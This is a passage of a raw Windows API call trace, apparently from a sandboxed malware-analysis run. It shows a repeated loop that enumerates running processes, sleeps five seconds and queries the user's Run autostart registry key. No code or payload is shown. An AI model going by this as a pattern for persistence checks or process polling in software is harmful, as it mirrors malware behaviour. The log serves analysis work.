(ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.678] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.680] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.681] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.692] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.692] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.692] NtClose (Handle=0x154) returned 0x0 [0182.692] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.692] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.693] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.693] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.694] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.695] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.696] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.709] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.709] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.709] NtClose (Handle=0x154) returned 0x0 [0182.709] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.710] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.710] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.710] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.711] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.713] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.713] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.723] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.723] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.723] NtClose (Handle=0x154) returned 0x0 [0182.723] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.724] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.724] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.724] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.724] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.726] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.727] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.739] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.739] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.739] NtClose (Handle=0x154) returned 0x0 [0182.739] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.740] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.740] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.741] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.741] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.744] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.745] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.754] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.754] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.755] NtClose (Handle=0x154) returned 0x0 [0182.755] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.755] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.756] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.756] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.756] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.758] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.758] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.770] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.770] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.770] NtClose (Handle=0x154) returned 0x0 [0182.770] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.770] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.771] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.771] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.771] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.773] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.773] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.792] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.793] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.793] NtClose (Handle=0x154) returned 0x0 [0182.793] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.793] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.794] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.796] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.796] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.802] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.803] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.803] NtClose (Handle=0x154) returned 0x0 [0182.803] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.803] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.804] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.804] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.804] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.806] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.807] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.818] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.818] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.818] NtClose (Handle=0x154) returned 0x0 [0182.818] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.819] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.819] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.819] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.821] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.821] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.832] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.832] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.832] NtClose (Handle=0x154) returned 0x0 [0182.833] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.833] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.834] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.834] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.836] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.837] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.848] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.848] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.848] NtClose (Handle=0x154) returned 0x0 [0182.848] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.849] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.849] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.849] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.850] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.852] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.852] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.866] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.866] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.866] NtClose (Handle=0x154) returned 0x0 [0182.866] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.866] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.867] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.867] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.867] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.869] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.870] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.879] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0182.879] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0182.879] NtClose (Handle=0x154) returned 0x0 [0182.879] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0182.880] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0182.880] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0182.880] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0182.881] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0182.883] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0182.883] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0182.896] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, 